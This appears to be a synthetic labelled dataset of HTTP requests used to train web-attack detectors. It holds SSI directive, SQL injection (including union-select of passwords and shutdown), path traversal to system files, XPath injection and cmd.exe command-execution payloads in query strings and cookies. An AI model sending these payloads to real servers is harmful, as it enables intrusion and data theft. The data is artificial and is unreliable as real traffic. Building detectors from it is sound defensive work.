----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41264
Start - Id: 39376
class: SSI
GET /schyOJbF-E/9edocumentJbY/zHr/mxarm/dt/e2Bf/oeghohmedteof/epeEc/hNwxp/SYATLWJ_documentA/seorneorrrinbyqwiEmi.tiff?QSJa=6539&idhlay8I=8433726591&uuh=Ras&elettgeempSnsei=84&nn3n5yenr5yn8b=7+iu&eesd5heyoT=%3C%21--%23echo+var%3D%22date_gmt%22--%3E&eidEnvtimleetr=039&nelrhjnpddEcj=f+E%3CnA&ta6ewmail=thsA9IEPd&rtEnky=htpassaiur2nanduqio&lYh-n=hbMtDV&FBeBgRxBjORn=iegtmp&ad=Y%3Dg&eevvowmE3=Metvbeo1dsitlxns HTTP/1.0
Host: www.tntxtn.org
Connection: keep-alive
Accept: text/html;q=0.2, image/gif;q=0.9
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: max-age=91502
Client-ip: 19.66.228.157
Cookie: xhonfh3lWa=owQGP2rYXL7o
Cookie2: $Version="412"
Date: Mon, 01 Jun 09 18:01:42 UTC
ETag: "NH0nqaIAQJf.Juk35"
Expect: 100-continue
From: lrS1n@ltwen24wwu.net
If-Modified-Since: Thu, 22 May 08 11:52:37 GMT
If-Unmodified-Since: Mon, 10 Oct 05 12:13:00 GMT
If-Match: *
If-None-Match: "uXL0HQhCfjcdBr8W.hI"
If-Range: *
Max-Forwards: 2
MIME-Version: 0.0
Pragma: no-cache
Proxy-Authorization: NTLM N3RGc3RpbGRnanRleWRzUGthc3MwcmVldGlESmo4ck4=
Authorization: NTLM QWNHYXBnNXphZXJuOHJtckdlZFV0Y3lnZFQ2b2MyMnRlZWVzZW5yVHN0bg==
Range: -7403,569103-
Referer: http://etdd8.be/hiaxqb/36oaaee.shtml
TE: gzip;q=0.6,trailers
Trailer: If-Modified-Since
User-Agent: veiag (tEu80@rV)
UA-CPU: x86
UA-Disp: 939,8855,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 3402x217
Via: srf/7.1 102.213.77.230, 8.4 www.cvnejn.shtml, auZPn/6.5 www.8erenawr.gif:163
Transfer-Encoding: baag
Upgrade: Dimzxj/0.5, brr9/9.8, nqe8/0.3
Warning: 979 www.1fezb.jpeg "hlSEv" 
X-Forwarded-For: 98.145.13.52
X-Serial-Number: 3967259354
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 39376
Start - Id: 39397
class: SSI
GET /rQtNtfsdThIse/kQnshutdownblogPWqfV/alnst3ciga/YR@/fqTIMO0M-Z/ezgxkL.ThBY-HfI/ctsdSdsdEvbTwv.gif?Dt7Hb_=%3C%21--%23email+fromhost%3D%22www.yt8hbi.com%22+tohost%3D%22mailbox.3synm.com%22+message%3D%22sjitaS+liYHqin+tmumf+enn%22+fromaddress%3D%22sioee.com%22+toaddress%3D%22rat.oetman.com%22+subject%3D%22ro%22+sender%3D%22iImt.com%22+replyto%3D%22idtvdY.com%22+cc%3D%22rad%22+inreplyto%3D%22oes5+Ish+oso%22+id%3D%22l0a3jmail%22+--%3E&eaw=aBgcmtjb-cf&TtiY2aftpCO03Z=712&E-QVgjQ_-XY=7n HTTP/1.0
Host: 205.202.34.20
Connection: 3odosu
Accept: */*;q=0.5
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: max-stale
Client-ip: 39.14.204.79
Cookie: gPtogetiro3zrmy=ialsam~ihtp L prns4R 
Cookie2: $Version="69"
Date: Fri, 15 Sep 06 20:18:14 CET
ETag: "4Brn_CPTrEZ4KqY"
Expect: TNjt=oHed
From: gdiexzng@dnnsS.com
If-Modified-Since: Sun, 11 Jan 04 08:20:19 UTC
If-Unmodified-Since: Fri, 13 Oct 06 06:00:21 GMT
If-Match: "@zivi-Q4_C9@k7b9"
If-None-Match: *
If-Range: Thu, 09 Oct 08 09:13:41 GMT
Max-Forwards: 6
MIME-Version: 4.0
Pragma: hph1n98=raka276c
Proxy-Authorization: reenr ueer=altyt2
Authorization: Basic bHRzaWV0dGU6bWVpcnM5
Range: 32-500
Referer: /re1nmLh/mon1il/ulIie/7b8u/i0dden.css
TE: chunked,deflate,deflate;q=0.2
Trailer: Accept
User-Agent: Mozilla/1.5 (Windows; U; Win98 0.1; 3d-ta; rv:3.3.4) Gecko/53786244
UA-CPU: x86
UA-Disp: 939,8855,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 696x8409
Via: 4.5 www.aasou1ta.jpeg, HTTP/1.2 www.iarc.jpg:161, FTP/9.6 www.lhonea.js:2
Transfer-Encoding: compress
Upgrade: Trtet/1.3, sieet/3.4, eced/6.6, yns/9.1, snfH/3.3
Warning: 807 171.93.211.15 "9neAr" "Tue, 14 Nov 06 22:05:25 UTC"
X-Forwarded-For: 193.181.203.122
X-Serial-Number: 2597611
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39397
Start - Id: 40790
class: SSI
GET /p8z.asmx?bsezteYehrshpm=2383827&eoHe9paonahi=9j4&ee=3&iss=780967&SirhogeMaO=h1xYVGGl6zxa&mRtZ=e3ahs&8Vuae4osoeaytq=i%40oJb%40z&s9rhaOa=hr8sgroup+byf&etlh=01&ariww=%3C%21--+++%23odbc+connect%3D%22slE%2CtrwFcp%2Cerbaa%22+++++++statement%3D%22select+*+++++from++hn0hA%22--%3E&oinlihsurah2bc=omoE HTTP/1.0
Host: 4.87.117.101
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: deflate, identity, identity;q=0.2, deflate;q=0.2, compress
Accept-Language: *
Cache-Control: min-fresh=41707
Client-ip: 79.174.208.245
Cookie: TGPFbmetai=ocwxitn4onse133lq;Pxesoe8nIlnnE=sEr4@T_txDr;andcWenzdljj=(;tnlsdaq0TlhHjsn=01;qLwY3tc=99;fisS9=6444906
Cookie2: $Version="363"
Date: Fri, 20 Oct 06 18:20:43 UTC
ETag: W/"W9T0XsxJpfJzhTByMX"
Expect: nsirg=5AerheO;iropdi=icem1yli
From: iipxpA@IasrDjh.ch
If-Modified-Since: Sat, 10 Oct 09 24:29:06 CET
If-Unmodified-Since: Fri, 30 May 08 15:26:43 GMT
If-Match: "V04sxmqFmdOGDxz6"
If-None-Match: *
If-Range: *
Max-Forwards: 0301
MIME-Version: 2.9
Pragma: 3ntirq='oy'
Proxy-Authorization: NTLM T3Zob2lzcW5lcmxidmVubnNpcmYzZGVmdGNyM3Vod2xvdGJs
Authorization: NTLM Y2lsZW1yb2lpckF0ZWFFUG9FMTY3ZVJkbmk0dGRpYWlkenBzcHJwa3JsYW5l
Range: 6294-616374
Referer: http://vr7a.org/icnHr.php3
TE: trailers,gzip
Trailer: Max-Forwards
User-Agent: Mozilla/6.5 (compatible; Konqueror/4.6; Open BSD i386; itEnsn)
UA-Disp: 9650,119,16
UA-OS: Win98
UA-Pixels: 4833x5333
Via: HTTP/8.5 101.28.60.155, FTP/6.3 www.ntem8p.tiff
Transfer-Encoding: compress
Upgrade: hfheyu/3.0, aae/3.8, rsayt/5.1, moh1r/4.2, ryonhi/6.6
Warning: 512 www.zgaaa4Nn.html "tnlssOrNs" 
X-Serial-Number: 095022921
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40790
Start - Id: 42004
class: SqlInjection
GET /tb6s2j8P/TinefnweTsheioh2/ykuXJeEXi@WM/@EN036_MinputOiframesa/ignTtfarHq97ip/.kreplaceGm2A.asp?9ht4ewcbn=-&osidshsiih5ul=%27union+select++++PASSWORD+++from++++DBA_PASSWORD%3B--&mnunpseEno=dsbeechojl%5Cc&emt=axGx&uheista2zi=ivZyT&iu=aD-8IQxu.fl&187Tunion=3562&ddd1f=38093&U@50UE36=npdghducE&NpN_insertBjiy=Uei7%5Dgisr8y%3Arlr&exec0kQ=eoEc%7Cbinepuperlje%27 HTTP/1.0
Host: 235.117.90.112
Connection: ronsa8H
Accept: audio/*, audio/x-wav, audio/*;q=0.2
Accept-Charset: macintosh;q=0.5, euc-kr;q=0.3, euc-jp, windows-1257;q=0.5, iso-8859-8-i;q=0.0
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 191.189.83.237
Cookie: ht8dsl=3070915;ptulsolrLslc=m si
Cookie2: $Version="53"
Date: Wed, 01 Sep 04 12:52:32 GMT
ETag: "op8@lxK_60rea_5cLJ"
Expect: 100-continue
From: ainlfaqa@smAa.fr
If-Modified-Since: Wed, 07 Jan 09 23:58:03 GMT
If-Unmodified-Since: Mon, 31 Jan 05 04:25:35 CET
If-Match: *
If-None-Match: "I22McVCSq8vVgbGF@.aq"
If-Range: "nxO.qpAVSt.hxMU"
Max-Forwards: 539
MIME-Version: 2.8
Pragma: no-cache
Proxy-Authorization: Digest uri=/oyooyi/aelsuo1/iteo/eu7usa/EDiri.cfm
Authorization: Basic clNvZTBlMnQ6ZXVmamFwYw==
Range: -2,-9858,-988607
Referer: http://www.n0tl.com/oaittay/eagm.cfm
TE: trailers,trailers
Trailer: Trailer
User-Agent: Mozilla/1.1 (X11; U; Open BSD i386 3.4; o4-he; rv:7.8.8) Gecko/25525207
UA-CPU: StrongARM
UA-Disp: 442,012,8
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 0057x268
Via: HTTP/5.0 www.leemnoa.gif
Transfer-Encoding: gzip
Upgrade: t4mmtm/8.9
Warning: 861 www.leOkisE.js "t5dd1agosNnsneae" "Sat, 17 Apr 04 02:49:48 UTC"
X-Forwarded-For: 53.133.215.134
X-Serial-Number: 063116688396663
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42004
Start - Id: 41291
class: SqlInjection
GET /eaeltuIge/wbdrhe/ogswe/YWYFPspcb/aninfD/80wxmlEYvgH_Zgkphp/Ycmd4MPsx_r/h3e8eYti/shWGax2IekpQpUneiz/RnFzudiaTtzh.bin?onUone6iuhS=35&eaiIul7oteEm=elttt+a%5Biqi%5C+i&e5kemlmeqtinlsn=x%3Ea&occndritetZSE2=gntteis8hxnt&fmhkI=9lntSanh+update6MoErlrna&qEr=ete7t7a0&wi=ercpeD&ehreu6ianurth=tqzODZTjKANz&5sbshEgnen=fH%40&Wm5Y38openS3=n9lehrgtNrmeeo&8nn8ne=hE6hlb_&rwknToii=tersa+nb&MYhlwlsFt4where8p=e_%40_mAnSwa8X&s21=n%2F+iNaslmtvn&eneheadeEj=osoeAsis HTTP/1.1
Host: 104.169.197.84
Connection: thsand
Accept: text/html, application/x-tar;q=0.6
Accept-Charset: *;q=0.5
Accept-Encoding: deflate;q=0.0, identity, deflate, identity
Accept-Language: *
Cache-Control: no-store
Client-ip: 237.136.70.223
Cookie: orthi=';   shutdown--;2ieOoZf6l=tdpseh hoboot.inialeOnrcpw;62VexecgPV_=mYVUBLtjouM;PC8Gj=3;swxxhn=649485344
Cookie2: $Version="7"
Date: Thu, 05 Feb 09 06:56:20 UTC
ETag: W/"g_lFTiKjT0lFJ077"
Expect: nrtl=nlejage;ovtlr3u
From: q5mitc@si2ecNlvy.uk
If-Modified-Since: Wed, 26 Oct 05 10:27:47 UTC
If-Unmodified-Since: Wed, 25 May 05 14:32:56 UTC
If-Match: "MoILtabDkTt2nX@QIqZ."
If-None-Match: *
If-Range: *
Max-Forwards: 0690
MIME-Version: 9.9
Pragma: no-cache
Proxy-Authorization: Digest cnonce="ifbj"
Authorization: ge8k sztt=to0c3
Range: 9-769078
Referer: http://www.aori.com/lealaa4e/eletdsQ0/vx0nhch/lcioeS/iNcqyh.rar
TE: trailers
Trailer: Trailer
User-Agent: Mozilla/1.1 (compatible; lsrcn3; Solaris; beiaetEI; ner8eiehm; r0epd1jae2)
UA-CPU: x86
UA-Disp: 8432,789,8
UA-OS: Win95
UA-Color: color16
Via: 3.2 118.141.8.201
Transfer-Encoding: compress
Upgrade: 1aa8/1.9, huin/7.7, ykium/1.0
Warning: 540 4.59.66.37 "ldiyu46vmehap" "Tue, 26 Feb 08 07:23:38 GMT"
X-Forwarded-For: 90.26.199.114
X-Serial-Number: 672862
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41291
Start - Id: 40946
class: SSI
GET /3aRhiRwEshB4lm/lPsxYwOaPlhjQn/cpO/m9CaQMK/PAqQS/Tle/n5H9mcY2d.ewGl8Jc3/kelieseeD2tf3t/xjtl.mspx?.CMiV=%3C%21--++%23odbc++statement+%3D++%22select+++staerlrv%2C++++o5%2C++4h++from++++ntrtsjd99+++order+++by+++3%2C++++976%2C+++1%22+++--%3E HTTP/1.0
Host: www.edpoelns.com
Connection: gn1cp
Accept: */*;q=0.4
Accept-Encoding: gzip
Accept-Language: cR-ut
Date: Sat, 22 Jan 05 02:15:07 UTC
Expect: 100-continue
If-Modified-Since: Sat, 15 Dec 07 10:03:11 UTC
If-Unmodified-Since: Wed, 30 Nov 05 15:23:46 GMT
If-None-Match: *
If-Range: "NtdPSKoELQ5hNY4cz8a_"
Proxy-Authorization: Digest uri=http://pubtmS.fr/cUdevTmc/neroi2.doc
Referer: /hsnlin/aban/leer/oc5tlY.aspx
User-Agent: ioukaeesufll
Via: FTP/5.2 200.144.211.204, 7.8 www.Bwda1tsm.gif:4
Transfer-Encoding: gzip

null

End - Id: 40946
Start - Id: 44883
class: PathTransversal
GET /tvw/eA/NntsaCr5setd/lvitt4nie/5ko8ldbn/in4eeeyme/JMk_EgCxzlpDnH/iaeetsdd7odwt/bcdto0hRsa/svaGO8xwUxMfTyS.gif?ns=9ztt&%um5703p@zK=750&onpR9=oxopesluueash8&OSqpJBcvbscriptPb=ouaci6&t3oe3esoNh=54638&cctJVlib=..%2F..%2FUBData%2FMembers%2Fmembers.grp%2500&itiSo5sonh=1650591&esleaAehtln=yeu&.ANR_L=t%3Clnfe%5D%5Cljejjh-irtsr HTTP/1.0
Host: www.3oa3dduhA.org
Connection: sbn4tk8n
Accept: */*
Accept-Charset: *;q=0.3
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-stale=93
Client-ip: 28.173.55.36
Cookie: ni4tair=;r2;ndosoatnrgef=erTmetascript;yiEtdiil=79240;xooh0i=mNohttp
Cookie2: $Version="7"
Date: Mon, 16 Mar 09 10:18:36 UTC
ETag: "Fg6uxv@CUmKOi65"
Expect: 100-continue
From: lalrk0d@mOge.gov
If-Modified-Since: Wed, 23 Jan 08 16:39:08 CET
If-Unmodified-Since: Mon, 01 Aug 05 14:41:59 UTC
If-Match: "UR_M8niLWBwxkN1yj"
If-None-Match: *
If-Range: Sat, 02 May 09 01:31:03 CET
Max-Forwards: 4558
MIME-Version: 2.7
Pragma: no-cache
Proxy-Authorization: Digest opaque="nwijehr"
Authorization: Basic T3N0bnJVOjFOZ2c=
Range: -41,56231-,-8575
Referer: http://www.aaiostle.be/pehu/okIn/sksapC.php
TE: chunked;q=0.1,chunked;q=0.3
Trailer: Expect
User-Agent: doroxd
UA-CPU: 68000
UA-Disp: 229,303,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 134x0521
Via: HTTP/6.5 www.nikaStl.htm, 3.9 57.191.67.7:59
Transfer-Encoding: identity
Upgrade: a04E/0.2, dOen6p/3.6
Warning: 919 218.70.108.162 "ndpaastlweaihe5" "Thu, 07 Apr 05 15:20:50 UTC"
X-Forwarded-For: 74.214.158.51
X-Serial-Number: 055847
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44883
Start - Id: 49258
class: XPathInjection
GET /6rqIa3@e6j6awXV/Ii_Xy6/1sCfhehfq/Z5JPcBKJ/as8tq/gl3stobyrRfjye/Y0eyt/e576udp/kluaY9bUhunlaeag/7dtteWnav09/u6-nl9qotEnsFt_1Xq/ahs3isaytire.asmx?02t7=3&.wY6=32941&dTPREd3fwhere=8&NmIdtpCn=e6a%27+++++or+path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3DN%5D+++or+%27oStcr%27+%3D++%27&a0Inenieqoeaepo=1162&httpVz1.Iu=529458&eM2q=sheil HTTP/1.0
Host: www.arhesst.fr
Connection: itesuhxe
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: *;q=0.9
Accept-Language: *;q=0.4
Cache-Control: no-transform
Client-ip: 209.54.77.194
Cookie: sock_streamsystem@8ney7K=et
Cookie2: $Version="395"
Date: Sun, 12 Apr 09 09:58:33 CET
ETag: W/"jGu3szARAyYEzvM"
Expect: wtti
From: lqie@4vraituc.com
If-Modified-Since: Tue, 18 Dec 07 20:44:23 GMT
If-Unmodified-Since: Sat, 02 Jan 10 11:49:31 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 23 Feb 08 07:25:46 GMT
Max-Forwards: 297
MIME-Version: 5.3
Pragma: no-cache
Proxy-Authorization: Basic bm9UdXk6cTBud210
Authorization: Digest qop=n0inlm
Range: 560-83908
Referer: http://Aaoix0h.st/era5Oe/lhit.wmn
TE: gzip;q=0.5
Trailer: TE
User-Agent: Mozilla/6.0 (Machintosh; U; Mac OS X 4.4; F9-5q; rv:6.0.5) Gecko/77244044
UA-CPU: StrongARM
UA-Disp: 2447,4165,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 666x0440
Via: HTTP/6.8 118.225.131.73, oczh/5.9 www.PuWi.gif, stu/6.2 www.js7neaot.html
Transfer-Encoding: gzip
Upgrade: ee0N/5.7, ya0/9.2, ekl/0.1, ersamh/6.5, Blfo/3.2
Warning: 766 www.bescjbow.shtml "teoihsrtpqht31emtis" "Mon, 21 Jul 08 01:55:47 CET"
X-Forwarded-For: 199.200.159.0
X-Serial-Number: 15070707581939695
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49258
Start - Id: 40849
class: SSI
GET /k2f/dihvq/tiq2smp3Iciew/n7EtKY5X/z6ac/7mecues6sHinz/tUJQX/d4Swftp/71-Yni4IJ0@.html?6dgbtc0nir=%3C%21--%23odbc++++connect%3D%22astd%2Cezj%2Capoxr%22++++++++statement%3D%22select+++*++from++ofa%22--%3E&ntSsdifmO8ae=lo HTTP/1.0
Host: 121.66.32.186:539
Connection: gdETieo
Accept: application/x-tar, image/*;q=0.3
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 183.188.60.40
Cookie: sctr0uTrTyszo=aGP;eeeepr5ostcs1j=qia;dle7aivs=snhq;ehlrnmv=7ue8aLsho;c2tiEny14abD=M
Cookie2: $Version="04"
Date: Sun, 18 May 08 13:33:05 GMT
ETag: "c4DJWXpb1.Q0Ita"
Expect: hw5e
From: ttntvsh@tetyoEibr.uk
If-Modified-Since: Wed, 10 Sep 08 15:57:11 GMT
If-Unmodified-Since: Mon, 24 Sep 07 15:32:54 UTC
If-Match: "WD4Y3yYdXzMK1.8jb"
If-None-Match: *
If-Range: Wed, 12 May 04 18:12:06 CET
Max-Forwards: 587
MIME-Version: 1.5
Pragma: owspp='oe2s7k'
Proxy-Authorization: Digest cnonce="li7or"
Authorization: Digest response="cEb6DD0aCD503BCcB8d61C8bF90B183f"
Range: 89-7,-933
Referer: /seznnk/len0frt/inSfoof.pdf
TE: trailers,trailers,trailers
Trailer: Date
User-Agent: Mozilla/8.7 (Machintosh; U; PPC Mac OS X 5.2; qz-on; rv:8.3.2) Gecko/47639851
UA-CPU: PowerPC
UA-Disp: 2426,7787,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 266x239
Via: FTP/1.0 252.218.227.187
Transfer-Encoding: deflate
Upgrade: iTdaap/8.9
Warning: 587 136.89.138.222 "srssp" "Sun, 31 Dec 06 15:59:03 UTC"
X-Forwarded-For: 38.3.235.137
X-Serial-Number: 49586702317462
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 40849
Start - Id: 36104
class: PathTransversal
GET /2UcBOrxY9jUyq/36sEkNnpbc/JxgnH-/oomt7mGZrgZm-Voc.php3?4MN4-nph-PE=hP6dcseltr&hFlib-UA=8208629655&htuy3ta9Es=370&ar=0Cdki&nushtre=melobjsp7s&ihnhrksnn=ahaLETo&gc2opsoeelA=od63gMMaEE&faE4D0suVsI=orea&vighh9nS7ybn=..%5C..%5C..%5C..%5C..%5C..%5CWINNT%5Csystem.ini&eisdIgAldoiise=%3Atsd%26&0PashtOeWs=218&sIzanTA=echoepre HTTP/1.1
Host: www.bus7i9e.biz
Connection: keep-alive
Accept: image/*;q=0.9
Accept-Charset: *;q=0.3
Accept-Encoding: deflate, gzip;q=0.3, identity
Accept-Language: ecFe0k-t;q=0.7, atitcyig-t;q=0.3, nnbmae0r-aanziij;q=0.1
Cache-Control: only-if-cached
Client-ip: 100.85.62.104
Cookie: lpwE7Tj4toYx=f%hssosock_streamlxp_1iihzt;a0tY6ytnyeheeen=aTA2;leud2=m0nthSK9Bc;S5oDM4z=ior ssfaaoha\vcopyl
Cookie2: $Version="1"
Date: Wed, 17 Mar 10 13:50:43 UTC
ETag: W/"END-QoI4eA7dNp1b9"
Expect: 100-continue
From: 7Croe@kumvreNv.biz
If-Modified-Since: Thu, 29 Oct 09 17:31:20 UTC
If-Unmodified-Since: Wed, 28 Jul 04 14:09:43 UTC
If-Match: *
If-None-Match: "xMeZS7p4aSgodpK58sc_"
If-Range: "ppBLUmU9fUJ9qZLp"
Max-Forwards: 5
MIME-Version: 3.5
Pragma: no-cache
Proxy-Authorization: NTLM aWVhbTh3ZWFleGRmaGd0cm5VMHN0ZXh2M2lnb05qdGVoZWhzdQ==
Authorization: Basic YXRPaXNhOmV0YWE=
Range: 78-
Referer: http://teHpil.st/anaPw4It/agpn/fntyg/eDapxb0e/2lna.swf
TE: trailers,trailers,chunked
Trailer: Referer
User-Agent: oe3iGnduk (u_pkMANtd; lcA08MD.Q@; acmv7h_tl; acESpA; exWdp4uHOc)
UA-CPU: Sparc
UA-Disp: 9693,338,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 8256x1298
Via: 7.9 www.3gie.js, FTP/0.3 95.29.145.152, oistc/5.2 1.216.98.0
Transfer-Encoding: deflate
Upgrade: 9tr9iu/0.9
Warning: 505 www.e3nDj.jpeg:48661 "atsjlrarlaaa" 
X-Forwarded-For: 77.201.61.163
X-Serial-Number: 5507795373725385751
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36104
Start - Id: 42275
class: SqlInjection
GET /z46Zn0Bd_f./t.Ok3R5m1W0KCAduj/e6w4t/nPn/uPX7zdD_Axke-Y8OVgY/lk0X1uzS/m1/e_qwFeWMTFXX8aOsp@/sxihgTgIKs2OS0/as.jpeg?ydtt6nmUe=815410&seeTrazdsemr=%27+or++id++in+%28+++select++++*+++++from++++user_db++%29 HTTP/1.0
Host: 160.134.8.171
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: cp-932;q=0.2, ks_c_5601-1987;q=0.5, cp-932, windows-1251;q=0.4, windows-1253
Accept-Encoding: 
Accept-Language: tet-Urd, qlrhn-0o44s
Cache-Control: no-transform
Client-ip: 241.101.146.87
Cookie: ivofOLdlc=r>hiezppi:netcatohrh;in2ZhfB1=reCziuouhulOeun:;d2ejit7nbllsit=819024;ptdtamnsndrtew=32e;eboiikti=oht;exAuNtnt=812087510
Cookie2: $Version="520"
Date: Thu, 27 Sep 07 18:54:08 GMT
ETag: W/"UOJpRKOdKk74BCKY"
Expect: nm9eac=yolte9
From: 8eae@aimsslc7.net
If-Modified-Since: Mon, 20 Mar 06 09:22:27 CET
If-Unmodified-Since: Sun, 28 Mar 04 16:15:54 UTC
If-Match: "Y1ciMa1aAWoKgz3ETly6"
If-None-Match: ".Kh_UJzKedpLQeOa5dn7"
If-Range: Fri, 04 May 07 23:40:22 UTC
Max-Forwards: 7678
MIME-Version: 5.2
Pragma: no-cache
Proxy-Authorization: NTLM ZWVlT2luN25CbmdyZmFla3JsbDF0YXkzZ3Rpa2xmbW4=
Authorization: Basic RWJjZTphaWw1czVhcg==
Range: 17-374188
Referer: http://www.Trsr.be/gEgtu/l7tt5/th9eLl/8capdu/0gt3b.mspx
TE: trailers
Trailer: Date
User-Agent: ghteaa
UA-CPU: PowerPC
UA-Disp: 8058,0040,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 0775x379
Via: 2.8 www.emyonca.tiff, HTTP/9.0 254.232.63.50, HTTP/2.0 51.215.62.167
Transfer-Encoding: 3flnn; hs5rnegd=i5sia
Upgrade: gtaeas/6.8, ae9e/5.6, rdaei/1.7, ilto/8.7, n5w/5.4
Warning: 301 34.243.209.148:30161 "olzejaFnho9ieieodT" "Fri, 02 Jan 09 11:48:48 CET"
X-Forwarded-For: 204.220.169.227
X-Serial-Number: 280200406213
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42275
Start - Id: 43601
class: OsCommanding
GET /t0x5E7MsrDixr/ymiohDTgkh0texie4t/l.VzomeNhFkU@8Y@/m1xE_T/eg72a7WuoS5kEdB/XS/hns3eh9F@5/iii5/na23IQteaetMobm/hoUxHg4kw92XAOe4o.jpg?idnibdyi=betweenbodydiwh&aprcnde7iybri=8387476&esj=sUMuQwU&uss=%40hdropy&ent=%5Cnls++%2Froot%2F HTTP/1.0
Host: 32.134.200.202
Connection: close
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Date: Thu, 11 Aug 05 08:22:44 UTC
Expect: 100-continue
From: nk0eit@nebiytg.uk
If-Modified-Since: Tue, 03 Nov 09 15:28:13 UTC
If-Unmodified-Since: Wed, 22 Jun 05 17:49:07 GMT
If-Range: Fri, 30 Jun 06 04:57:17 GMT
Max-Forwards: 520
Pragma: ts3='l4rn2ec'
Proxy-Authorization: NTLM UG9mNWFvcm9sRWJwZTVhdWFidG94MGF0c2dvZXVrcjNlc3V0
Authorization: ert8 sliox7it=enta
Referer: http://jlrs.gov/jLdsmr/endl/hnjzsd3.html
User-Agent: Mozilla/4.1 (Windows; U; Win98 9.2; dn-ds; rv:8.2.2) Gecko/48631064
UA-OS: WinNT
Via: 6.6 www.lrl68aE.shtml
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43601
Start - Id: 43881
class: OsCommanding
GET ..%%35c../..%%35c../..%35c../..%35c../winnt/system32/cmd.exe? HTTP/1.1
Host: 31.152.73.249
Connection: dNtewHml
Accept: image/jpeg;q=0.8
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=375
Client-ip: 182.179.139.200
Cookie: UiaE0dN8TDm=7gihadmineotmpo
Cookie2: $Version="294"
Date: Mon, 25 Apr 05 18:54:32 CET
ETag: "4p2ZiLBnvJxcMOdpmaxa"
Expect: etc4ouNl=anmics2L
From: 2bgyahe@ty1w.biz
If-Modified-Since: Sat, 29 May 04 23:57:30 UTC
If-Unmodified-Since: Mon, 01 Sep 08 18:24:09 GMT
If-Match: "j2zPSsbUPKqCmgA7h6V3"
If-None-Match: "o80Br3oYw_Toit0ij@"
If-Range: "sEmGKjYhKUj0AqLv08J"
Max-Forwards: 063
MIME-Version: 8.2
Pragma: no-cache
Proxy-Authorization: Digest uri=/uiers/ieatYM/iCiR.tiff
Authorization: Basic dkVhczg6c2V0cG9laHA=
Range: 40517-,9-9675
Referer: http://www.ehi3.ch/afsseax/de1adb6t.css
TE: gzip;q=0.3
Trailer: Accept-Language
User-Agent: Mozilla/1.5 (Windows; U; WinNT 0.0; ng-es; rv:2.7.1) Gecko/21657456
UA-CPU: Sparc
UA-Disp: 708,9864,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 629x1097
Via: 6.1 176.155.150.83, FTP/6.3 97.182.50.39
Transfer-Encoding: compress
Upgrade: oBor/5.4, bstr/6.6
Warning: 453 28.223.229.127 "anutRoc7" 
X-Forwarded-For: 160.49.9.9
X-Serial-Number: 983467996985112
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43881
Start - Id: 44329
class: OsCommanding
GET ..%c1%8s...%c1%8s..%c1%8s..%c1%8s..%c1%8s../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.wcz0tiR.fr
Connection: sshennhl
Accept: text/*;q=0.1
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=222
Client-ip: 202.227.254.173
Cookie: pexk=zO-HOG91k;fAEmf5olleo=pterftnf1IIwye;LVSfj70KRNZ=68530883;hIloaaggrunqm=1iWvsy;gmualoe5t=xmletei
Cookie2: $Version="92"
Date: Mon, 05 Apr 10 06:15:47 UTC
ETag: "JwOlqko42x3NtlOT"
Expect: 100-continue
From: ssaaei@srTei5is.de
If-Modified-Since: Wed, 12 May 04 06:36:34 UTC
If-Unmodified-Since: Fri, 11 Jan 08 24:08:50 UTC
If-Match: "Ys3-t@Nfjjqzz8p"
If-None-Match: *
If-Range: "KifzXthQy8DwbK-h6d"
Max-Forwards: 0173
MIME-Version: 1.6
Pragma: htx5P='d'
Proxy-Authorization: Basic T2hsMGg6YWFhMg==
Authorization: Digest qop=o9hhYhvt
Range: 88-15414
Referer: /6gda.aspx
TE: deflate;q=0.5
Trailer: If-None-Match
User-Agent: Mozilla/3.8 (Machintosh; U; PPC Mac OS X 3.7; rr-tc; rv:6.5.8) Gecko/55095361
UA-CPU: PowerPC
UA-Disp: 9070,4804,16
UA-OS: Windows NT
UA-Color: color32
